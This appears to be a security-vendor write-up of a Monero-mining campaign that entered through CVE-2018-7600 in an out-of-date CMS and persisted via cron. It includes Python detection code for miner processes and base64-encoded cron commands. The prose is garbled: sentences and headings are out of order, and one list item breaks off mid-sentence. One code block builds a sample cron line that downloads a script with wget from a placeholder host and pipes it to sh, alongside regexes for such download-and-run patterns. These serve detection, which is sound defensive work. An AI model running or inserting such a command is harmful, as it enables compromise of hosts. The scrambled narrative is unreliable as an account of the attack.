Using a cloud security solution like Azure Security Center continuously monitors the security of your networks, machines, and Azure services and alerts you when unusual activity is detected.
Azure Security Center (ASC) spotted the attack in real time and alerted the affected customer with the following alerts:
The miner is compiled with its configuration embedded and pulls mining jobs from the mining proxy server, so we were unable to estimate the attacker's earnings or the number of victims.
- Suspicious file download — Potential malicious file download with wget detected
- Suspicious CRON job — Potential suspicious scheduling task access discovered
- Suspicious activity — ASC detected periodic file downloads and execution from a suspicious source
- Process executed from suspicious location
2. Mining pools – Crypto mining operations are managed by a mining pool, which gathers multiple clients to contribute hashing power and shares the earnings across them. Once an attacker is exposed, their account may be blocked, yet most attackers still use public mining pools because they are simple to set up and use. We noticed an increasing number of cases where attackers used their own mining proxy machine. This technique helps the attacker remain anonymous, both from detection by a security product on the server (like Azure Security Center threat detection for Linux) and from detection by the public mining pool.
By analyzing the behavior of crypto miners, we noticed 2 indicators of crypto-miner-driven attacks:
The binary checks whether the machine is already compromised, and then downloads, using an HTTP 1.1 POST request, one of two binary files depending on the number of processors the machine has.
We also learned from the telemetry gathered from the affected machines that this first command line executes in the "apache" user context, inside the corresponding CMS working directory.
Azure Security Center discovered a cryptocurrency mining operation.
[Image: Cron command running wget]
The URL path also references the CMS name, another indication of the entry point (and of a sloppy attacker, too).
This vulnerability exists in an old version of this CMS and is expected to affect a large number of websites that are running out-of-date versions. The root cause of the vulnerability is inadequate input validation in an API call.
This operation takes advantage of an old version of a well-known open source CMS with a famous RCE vulnerability (CVE-2018-7600) as the entry point; then, after using the CRON utility for persistence, it mines "Monero" cryptocurrency using a freshly compiled binary of the "XMRig" open-source crypto mining tool.
Mining activity is easy to detect most of the time because it consumes considerable resources.
The big picture
Following the traces the attacker left, we could track the entry point of this malware and conclude that it originated by leveraging a remote code execution vulnerability in a popular open source CMS, CVE-2018-7600.
The entry point
- Process name – from popular open source miners to less known mining campaigns
- Command line arguments such as known pool domain names, crypto hash calculations, mining protocol, etc.
- CPU usage consumption
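The three indicators above (process name, command line arguments, CPU usage) can be turned into a simple scoring rule over a process snapshot. The following is an added example written for this page, not code from Azure Security Center or from the original post; the process records, the miner name list, the pool-domain and hash-algorithm regular expressions and the 90% CPU threshold are all constructed assumptions, and the rule requires at least two indicators so that a renamed miner binary (the "kworker" record below) is still caught while a busy legitimate worker is not.

```python
import re

# Constructed sample process snapshot (pid, name, command line, CPU%); not real telemetry.
SAMPLE_PROCESSES = [
    {"pid": 1201, "name": "apache2", "cmdline": "/usr/sbin/apache2 -k start", "cpu": 1.5},
    {"pid": 2307, "name": "xmrig",
     "cmdline": "./xmrig -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER -p x --algo cryptonight",
     "cpu": 97.2},
    # Miner renamed to look like a kernel thread; only the arguments and CPU give it away.
    {"pid": 2410, "name": "kworker",
     "cmdline": "./kworker -o stratum+tcp://proxy.example.invalid:443 --donate-level=1",
     "cpu": 92.0},
    # Legitimate CPU-heavy job: high CPU alone must not be enough to flag it.
    {"pid": 3001, "name": "python3", "cmdline": "python3 /opt/app/worker.py", "cpu": 45.0},
]

# Indicator 1: process names of popular open source miners (assumed list).
KNOWN_MINER_NAMES = {"xmrig", "minerd", "cpuminer", "xmr-stak"}
# Indicator 2: command line arguments. Assumed heuristics for pool domains,
# the stratum mining protocol and common hash algorithm names.
POOL_DOMAIN_RE = re.compile(r"\b[\w.-]*(pool|xmr|monero|mine)[\w.-]*\.[a-z]{2,}\b", re.I)
MINING_PROTO_RE = re.compile(r"\bstratum\+(tcp|ssl|tls)://", re.I)
HASH_ALGO_RE = re.compile(r"\b(cryptonight|randomx|cn/[\w-]+|argon2)\b", re.I)
# Indicator 3: sustained CPU usage (assumed threshold).
CPU_THRESHOLD = 90.0


def score_process(proc):
    """Return the list of miner indicators that match one process record."""
    reasons = []
    if proc["name"].lower() in KNOWN_MINER_NAMES:
        reasons.append("known-miner-name")
    cmd = proc["cmdline"]
    if MINING_PROTO_RE.search(cmd):
        reasons.append("stratum-protocol")
    if POOL_DOMAIN_RE.search(cmd):
        reasons.append("pool-domain")
    if HASH_ALGO_RE.search(cmd):
        reasons.append("hash-algorithm")
    if proc["cpu"] >= CPU_THRESHOLD:
        reasons.append("high-cpu")
    return reasons


def find_miners(procs, min_indicators=2):
    """Return (pid, reasons) for every process with at least min_indicators hits."""
    flagged = []
    for proc in procs:
        reasons = score_process(proc)
        if len(reasons) >= min_indicators:
            flagged.append((proc["pid"], reasons))
    return flagged


if __name__ == "__main__":
    for pid, reasons in find_miners(SAMPLE_PROCESSES):
        print(f"pid {pid}: {', '.join(reasons)}")
```

In a real deployment the snapshot would come from `ps` output or a process-creation event stream, and the CPU indicator should be measured over an interval rather than a single sample, since miners are distinguished by sustained rather than momentary load.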
Prevention and conclusion
We did an investigation and found that all of them ran an unpatched version of the CMS, which is exposed to a security flaw that allows an attacker to run malicious code on the vulnerable resource.
1. Killing competitors — Most crypto-attacks assume that the system is already compromised, and attempt to kill other competitors for the machine's computing power. It does this
Preventing this attack is as simple as installing the latest security updates. A preferred option might be to use SaaS (Software as a Service) instead of maintaining a complete web server and software environment.
The bash file (as we captured it at the time) downloads the binary file and executes it (as seen in the picture above).
Another common method we identified is to reset the CRON tab, which in many cases is used as a persistence method by other compute power competitors.
Decoding the base64 component of this command line reveals the download and execution of a bash script file through the CRON utility:
The initial suspicious command line we noticed on the Linux machines was:
[Image: Base64 decoded bash command line (details censored) – wget sh]
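The ASC alerts listed earlier (a wget download, a suspicious CRON job, periodic download-and-execute) and the base64-wrapped command line just described can be checked for with the same logic: decode any base64 token in a captured command line and look, in both the outer command and the decoded payload, for a download tool, a pipe into a shell, and a cron schedule or crontab invocation. This is an added example for this page, not Azure Security Center's detection code; the sample command lines are constructed in the block itself (the encoded payload is built with `base64.b64encode` so it decodes correctly), and the regular expressions and the "three or more findings" threshold are assumptions.

```python
import base64
import re

# Base64 alphabet run long enough to be a payload rather than a short flag or path.
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")
DOWNLOADER_RE = re.compile(r"\b(wget|curl)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash)\b")
# Either an explicit crontab call or a line starting with five cron schedule fields.
CRON_RE = re.compile(r"\bcrontab\b|^\s*([\d*/,-]+\s+){5}", re.M)

# Constructed samples. The first mimics the pattern described above: a base64
# blob piped into base64 -d and then into crontab, whose decoded content is a
# cron line that fetches a script with wget and pipes it to sh.
CONSTRUCTED_PAYLOAD = "* * * * * wget -q -O - http://example.invalid/x.sh | sh"
SAMPLE_CMDLINES = [
    "sh -c 'echo " + base64.b64encode(CONSTRUCTED_PAYLOAD.encode()).decode() + " | base64 -d | crontab -'",
    "sh -c 'echo " + base64.b64encode(b"hello world").decode() + " | base64 -d'",
    "/usr/sbin/apache2 -k start",
]


def decode_b64_tokens(cmdline):
    """Return the UTF-8 text of every token in cmdline that decodes as valid base64."""
    decoded = []
    for match in B64_TOKEN_RE.finditer(cmdline):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad length or alphabet
            continue
        try:
            decoded.append(raw.decode("utf-8"))
        except UnicodeDecodeError:
            continue
    return decoded


def analyze_cmdline(cmdline):
    """Return the sorted list of findings for one command line and its decoded payloads."""
    findings = set()
    payloads = decode_b64_tokens(cmdline)
    if payloads:
        findings.add("base64-payload")
    for text in [cmdline, *payloads]:
        if DOWNLOADER_RE.search(text):
            findings.add("download-tool")
        if PIPE_TO_SHELL_RE.search(text):
            findings.add("pipe-to-shell")
        if CRON_RE.search(text):
            findings.add("cron-persistence")
    return sorted(findings)


def is_suspicious(cmdline, min_findings=3):
    """Assumed policy: three or more findings on one command line is worth an alert."""
    return len(analyze_cmdline(cmdline)) >= min_findings


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(is_suspicious(cmd), analyze_cmdline(cmd), cmd[:60])
```

The decode step matters more than any single regex: a rule that only inspects the visible command line never sees the wget, the pipe into sh or the schedule, because all three live inside the base64 blob. Running this over process-creation or auditd command lines on a web host gives a cheap first filter for the periodic download-and-execute behaviour ASC alerted on.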